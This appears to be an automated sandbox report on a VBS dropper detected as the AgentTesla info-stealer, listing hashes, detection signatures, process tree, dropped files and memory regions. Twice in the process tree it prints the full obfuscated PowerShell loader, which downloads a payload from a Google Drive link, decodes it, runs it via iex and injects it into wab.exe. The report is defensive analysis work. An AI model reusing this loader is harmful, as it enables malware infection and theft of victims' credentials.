Analysis

  • max time kernel
    148s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    09-05-2024 02:18

General

  • Target

    f56414caa063dd9e04d5fd62d570ce003b1b469d5320ff5df5c62a2ebfcdb5fd.vbs

  • Size

    10KB

  • MD5

    0ccafea880ed43555fdcba60edf93559

  • SHA1

    01cb51d525785dd3a44f48e35a47044a8beb4d7e

  • SHA256

    f56414caa063dd9e04d5fd62d570ce003b1b469d5320ff5df5c62a2ebfcdb5fd

  • SHA512

    37b8e04ab367816d9bab3087adf192cdbdbac99e49205cd7c89de1916a52f4457217995d18185c66a926a58e97c2be5aaeffc696b879f6e9101be88c3c29e84c

  • SSDEEP

    192:bN5CdCtmn8iF5ofmmC3dFComvOLCem903ujbOaHRDj7LgvUku1sa6/69yc+A0:bqCtmNMhmVqlzLgXiAc+A0

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Detect packed .NET executables. Mostly AgentTeslaV4. 2 IoCs
  • Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 2 IoCs
  • Detects executables referencing Windows vault credential objects. Observed in infostealers 2 IoCs
  • Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 2 IoCs
  • Detects executables referencing many email and collaboration clients. Observed in information stealers 2 IoCs
  • Detects executables referencing many file transfer clients. Observed in information stealers 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f56414caa063dd9e04d5fd62d570ce003b1b469d5320ff5df5c62a2ebfcdb5fd.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2940
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$udfrtes = 1;$Shellier='Su';$Shellier+='bstrin';$Shellier+='g';Function Braiserede($Tubularia){$Toluate=$Tubularia.Length-$udfrtes;For($Paatalerettighed=1;$Paatalerettighed -lt $Toluate;$Paatalerettighed+=2){$Othake+=$Tubularia.$Shellier.Invoke( $Paatalerettighed, $udfrtes);}$Othake;}function Thoughten($Ekspertliniens){. ($Senilism) ($Ekspertliniens);}$Spooling=Braiserede ' M oFzCiDl.lPa / 5F. 0 .( WGiDnTdBo wDs. NDTU A1,0H.P0V; FWLi nU6s4T;u xE6K4.; yr v,: 1R2 1 .N0S)T G eFcLkRoS/r2 0R1D0T0.1 0U1 LF iSr,e f,oHx / 1S2K1S.,0K ';$Dyrskuet=Braiserede 'IUSsie r -fA gPe nUtT ';$Upsettal=Braiserede 'Mh,t tspDss:K/,/ dBr.iKv.eT..gPoPoPgUlKeC.HcDo mC/ u,c.? eGx proFrRtA=IdVoBwHnblKo,a d &,iMdS= 1 KwsGB BEsIDSQ.v Z TSAAPAmPjAsLO kBoSf f,6 qS_ 9COVnMA,Q w L gFX ';$Ampullitis=Braiserede ' >R ';$Senilism=Braiserede ' iAe.xE ';$Idaline='Taskekrabbens';Thoughten (Braiserede ' SHeCt -DCCoCn.tUe.n t, - PFa tChB UT,:T\dPVr e f r i eMn d,s hUi.pS.ytPxFtu .-,V,aWlTu.e .$.I.d aBlni,n e ; ');Thoughten (Braiserede ' i f ( tAe s tP-Mp a.t h, PT : \,PIr.eSfNrAi eMnSdCsah.iDpS. t x,tF)m{Ee x i,tY}S;, ');$definitionsvinduerne = Braiserede 'DeEcFhNo C%aaMp,pPdOact,a,%K\TL.a nEdAm a,n.d eTnK..MPoVtT E& &s .e.c hFo $ ';Thoughten (Braiserede 'P$.g lRo bCa lS:PS eIrLv a.nPtSeTsMt e.lL=,(FcAmTdU ,/ cM T$ dKe.f,i n i tBiAo nEsUvGi n dNuReIrSnCeU)P ');Thoughten (Braiserede 'N$Tg l,o b a l,:,LTu f t aIr t eWrLs =B$ UDpSs,e tPt a li.Ss pKl i,t ( $DA,mKpFuSlOl.i.tIi s ) ');$Upsettal=$Luftarters[0];Thoughten (Braiserede 'P$Kg lUo,bPaSlA:FCDl.yAsRt,eTr,sT=SNOeLw -NO.bLj e.c tG S yFsWtSe m,.RNAe.tK..W.e,b CSloi.e nGtP ');Thoughten (Braiserede ',$OC,lDyAsStEeGr sR. HSe a d eSr.s [ $ D y,r s k.u.e.t.],= $ S p oSoAlki nUg. ');$Fremstillelser=Braiserede ' CElSy.sPt.e,r s .CDSoCwkn lNoJaHd,FFiHl eC( $ U.prsReSt tFaIlW,S$WHSo n.oSr,aTrSieuAmCs,) ';$Fremstillelser=$Servantestel[1]+$Fremstillelser;$Honorariums=$Servantestel[0];Thoughten (Braiserede ' $Sg lMoDb a lA:.UVn.t,rDa nMsAl a tSa,bPlSyU=N(BTHeUs t.- P a t h. S$FH,o,n o rUa rui,uDm,sI). ');while (!$Untranslatably) {Thoughten (Braiserede '.$Gg,l o bFa l,:FSfjrlDeSg rBu p.pAe,=,$TtFr uCel ') ;Thoughten $Fremstillelser;Thoughten (Braiserede ',SetUa,r,t.-SSjlseAe.pS F4E ');Thoughten (Braiserede 'B$ gSl o b a,lQ:PUMnCtCr aGnUsslAa,t aFbSlOyL=V(VTTeAs,t,-,PTa t,h. $.H o n oLraa rOi u mRsG) ') ;Thoughten (Braiserede ' $fgLl o.bOa l,:KL,oan,e,rTsK=,$ gal o b aHl :sNPo nCgCaBr r.u lpoPu,s,l y.1.6B2A+S+ %,$FLVuPfNt aMr,t e,r sU. c oTuFnQt. ') ;$Upsettal=$Luftarters[$Loners];}$Arkiverer=327870;$vidtbermt=26048;Thoughten (Braiserede 'F$,gElBo bUaAlD:RPSr e.sRbSyLtsi,c u=G G e t.-,CDo nTtKe n t, M$FHZo nLo.rTavr.i u mLs. ');Thoughten (Braiserede 'K$TgDl o b.aLlU:OLFrKe rkiKg ePsKtN C=K D[SSKyKsBtDe mR. CPoSnKvUe rOtV] :,:.F rVoOm.BPaUsReB6S4VSSt rLi.n,g ( $SP,r e s bPy,t iBcP)n ');Thoughten (Braiserede 'P$Lg l,o.b aclS: R,a,sCeBrVe.rG ,=m .[ S yRsTtSeSm,. T e xLtS..E,n c.oPdTiCnUgS]B:,:EACSCC I IS.,GNeTtcSEthr,i.n g,(G$DL rDeSr i g e s.t ) ');Thoughten (Braiserede 'P$ggLl oOb.aHlP: P.y oTp e rLi,cBaCrPd i tciFsO= $MR.a s.eMrEeSr,. s.uDb,sAtHr iRnMgB( $ AVr.kDi vFe r e rV,R$.vki dKt bCe,rSm,t,), ');Thoughten $Pyopericarditis;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2636
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Landmanden.Mot && echo $"
        3⤵
          PID:2520
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$udfrtes = 1;$Shellier='Su';$Shellier+='bstrin';$Shellier+='g';Function Braiserede($Tubularia){$Toluate=$Tubularia.Length-$udfrtes;For($Paatalerettighed=1;$Paatalerettighed -lt $Toluate;$Paatalerettighed+=2){$Othake+=$Tubularia.$Shellier.Invoke( $Paatalerettighed, $udfrtes);}$Othake;}function Thoughten($Ekspertliniens){. ($Senilism) ($Ekspertliniens);}$Spooling=Braiserede ' M oFzCiDl.lPa / 5F. 0 .( WGiDnTdBo wDs. NDTU A1,0H.P0V; FWLi nU6s4T;u xE6K4.; yr v,: 1R2 1 .N0S)T G eFcLkRoS/r2 0R1D0T0.1 0U1 LF iSr,e f,oHx / 1S2K1S.,0K ';$Dyrskuet=Braiserede 'IUSsie r -fA gPe nUtT ';$Upsettal=Braiserede 'Mh,t tspDss:K/,/ dBr.iKv.eT..gPoPoPgUlKeC.HcDo mC/ u,c.? eGx proFrRtA=IdVoBwHnblKo,a d &,iMdS= 1 KwsGB BEsIDSQ.v Z TSAAPAmPjAsLO kBoSf f,6 qS_ 9COVnMA,Q w L gFX ';$Ampullitis=Braiserede ' >R ';$Senilism=Braiserede ' iAe.xE ';$Idaline='Taskekrabbens';Thoughten (Braiserede ' SHeCt -DCCoCn.tUe.n t, - PFa tChB UT,:T\dPVr e f r i eMn d,s hUi.pS.ytPxFtu .-,V,aWlTu.e .$.I.d aBlni,n e ; ');Thoughten (Braiserede ' i f ( tAe s tP-Mp a.t h, PT : \,PIr.eSfNrAi eMnSdCsah.iDpS. t x,tF)m{Ee x i,tY}S;, ');$definitionsvinduerne = Braiserede 'DeEcFhNo C%aaMp,pPdOact,a,%K\TL.a nEdAm a,n.d eTnK..MPoVtT E& &s .e.c hFo $ ';Thoughten (Braiserede 'P$.g lRo bCa lS:PS eIrLv a.nPtSeTsMt e.lL=,(FcAmTdU ,/ cM T$ dKe.f,i n i tBiAo nEsUvGi n dNuReIrSnCeU)P ');Thoughten (Braiserede 'N$Tg l,o b a l,:,LTu f t aIr t eWrLs =B$ UDpSs,e tPt a li.Ss pKl i,t ( $DA,mKpFuSlOl.i.tIi s ) ');$Upsettal=$Luftarters[0];Thoughten (Braiserede 'P$Kg lUo,bPaSlA:FCDl.yAsRt,eTr,sT=SNOeLw -NO.bLj e.c tG S yFsWtSe m,.RNAe.tK..W.e,b CSloi.e nGtP ');Thoughten (Braiserede ',$OC,lDyAsStEeGr sR. HSe a d eSr.s [ $ D y,r s k.u.e.t.],= $ S p oSoAlki nUg. ');$Fremstillelser=Braiserede ' CElSy.sPt.e,r s .CDSoCwkn lNoJaHd,FFiHl eC( $ U.prsReSt tFaIlW,S$WHSo n.oSr,aTrSieuAmCs,) ';$Fremstillelser=$Servantestel[1]+$Fremstillelser;$Honorariums=$Servantestel[0];Thoughten (Braiserede ' $Sg lMoDb a lA:.UVn.t,rDa nMsAl a tSa,bPlSyU=N(BTHeUs t.- P a t h. S$FH,o,n o rUa rui,uDm,sI). ');while (!$Untranslatably) {Thoughten (Braiserede '.$Gg,l o bFa l,:FSfjrlDeSg rBu p.pAe,=,$TtFr uCel ') ;Thoughten $Fremstillelser;Thoughten (Braiserede ',SetUa,r,t.-SSjlseAe.pS F4E ');Thoughten (Braiserede 'B$ gSl o b a,lQ:PUMnCtCr aGnUsslAa,t aFbSlOyL=V(VTTeAs,t,-,PTa t,h. $.H o n oLraa rOi u mRsG) ') ;Thoughten (Braiserede ' $fgLl o.bOa l,:KL,oan,e,rTsK=,$ gal o b aHl :sNPo nCgCaBr r.u lpoPu,s,l y.1.6B2A+S+ %,$FLVuPfNt aMr,t e,r sU. c oTuFnQt. ') ;$Upsettal=$Luftarters[$Loners];}$Arkiverer=327870;$vidtbermt=26048;Thoughten (Braiserede 'F$,gElBo bUaAlD:RPSr e.sRbSyLtsi,c u=G G e t.-,CDo nTtKe n t, M$FHZo nLo.rTavr.i u mLs. ');Thoughten (Braiserede 'K$TgDl o b.aLlU:OLFrKe rkiKg ePsKtN C=K D[SSKyKsBtDe mR. CPoSnKvUe rOtV] :,:.F rVoOm.BPaUsReB6S4VSSt rLi.n,g ( $SP,r e s bPy,t iBcP)n ');Thoughten (Braiserede 'P$Lg l,o.b aclS: R,a,sCeBrVe.rG ,=m .[ S yRsTtSeSm,. T e xLtS..E,n c.oPdTiCnUgS]B:,:EACSCC I IS.,GNeTtcSEthr,i.n g,(G$DL rDeSr i g e s.t ) ');Thoughten (Braiserede 'P$ggLl oOb.aHlP: P.y oTp e rLi,cBaCrPd i tciFsO= $MR.a s.eMrEeSr,. s.uDb,sAtHr iRnMgB( $ AVr.kDi vFe r e rV,R$.vki dKt bCe,rSm,t,), ');Thoughten $Pyopericarditis;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:340
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Landmanden.Mot && echo $"
            4⤵
              PID:2680
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1572

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        344B

        MD5

        f892aac4be3e5972e697e704f6c9334a

        SHA1

        f7acd3f6fe6aa29ef93956d4daea91cfe65adb92

        SHA256

        5775f5bb83c907d770079f16b2411c2683bbadf6d1392836830ed68c1594cc1a

        SHA512

        516ea292554839f331dd1b535c5de435fd9740702274e9f28e03bb3794be2f4a6b41ad25da13db267b5f921f0a68c8c585f4796125d3f9d39dfe5c0aae948228

      • C:\Users\Admin\AppData\Local\Temp\Cab1A94.tmp

        Filesize

        68KB

        MD5

        29f65ba8e88c063813cc50a4ea544e93

        SHA1

        05a7040d5c127e68c25d81cc51271ffb8bef3568

        SHA256

        1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

        SHA512

        e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

      • C:\Users\Admin\AppData\Local\Temp\TarAC47.tmp

        Filesize

        177KB

        MD5

        435a9ac180383f9fa094131b173a2f7b

        SHA1

        76944ea657a9db94f9a4bef38f88c46ed4166983

        SHA256

        67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

        SHA512

        1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

      • C:\Users\Admin\AppData\Roaming\Landmanden.Mot

        Filesize

        460KB

        MD5

        9344dd070d1a8091bb0f6c5b7312678f

        SHA1

        c0b15173f8f94727c76c7e850a6b8231fbda5ad4

        SHA256

        cd1f782cb90ed5cce53779a1c0cc786f9f18f2f35e8fbf8279726a091298ab76

        SHA512

        ae1afe3163026b7f87ea218b4c2b02ea5a56f93c56de4983a2c943051abd65c7317244dd7489d3477f70f004f1cc87fdb6e5042e46e3359d251a9c335092f93f

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K6HITX0AMGBLS3PJ9LPW.temp

        Filesize

        7KB

        MD5

        673ce33be4455638cb77af8fbcd7c69c

        SHA1

        d9bd907d3d16e35017ecd6fde8c197dfce2492d9

        SHA256

        12bf5d66e01c2a2ab430273ac32bfd90b3d6847c41c0aa6d5c54ac46954d8f62

        SHA512

        ee371d48bfc14b9b5636224570797c85c663d47016c090b2304551886988a6fbed84496378d9e117570722eb12a6d0b702798336f49e20c6e5b889820d820f2e

      • memory/340-33-0x0000000006790000-0x000000000947D000-memory.dmp

        Filesize

        44.9MB

      • memory/1572-62-0x0000000000800000-0x0000000000840000-memory.dmp

        Filesize

        256KB

      • memory/1572-61-0x0000000000800000-0x0000000001862000-memory.dmp

        Filesize

        16.4MB

      • memory/1572-56-0x0000000000800000-0x0000000001862000-memory.dmp

        Filesize

        16.4MB

      • memory/2636-27-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

        Filesize

        9.6MB

      • memory/2636-22-0x0000000002290000-0x0000000002298000-memory.dmp

        Filesize

        32KB

      • memory/2636-23-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

        Filesize

        9.6MB

      • memory/2636-34-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

        Filesize

        9.6MB

      • memory/2636-35-0x000007FEF553E000-0x000007FEF553F000-memory.dmp

        Filesize

        4KB

      • memory/2636-21-0x000000001B620000-0x000000001B902000-memory.dmp

        Filesize

        2.9MB

      • memory/2636-20-0x000007FEF553E000-0x000007FEF553F000-memory.dmp

        Filesize

        4KB

      • memory/2636-26-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

        Filesize

        9.6MB

      • memory/2636-24-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

        Filesize

        9.6MB

      • memory/2636-25-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

        Filesize

        9.6MB

      • memory/2636-63-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

        Filesize

        9.6MB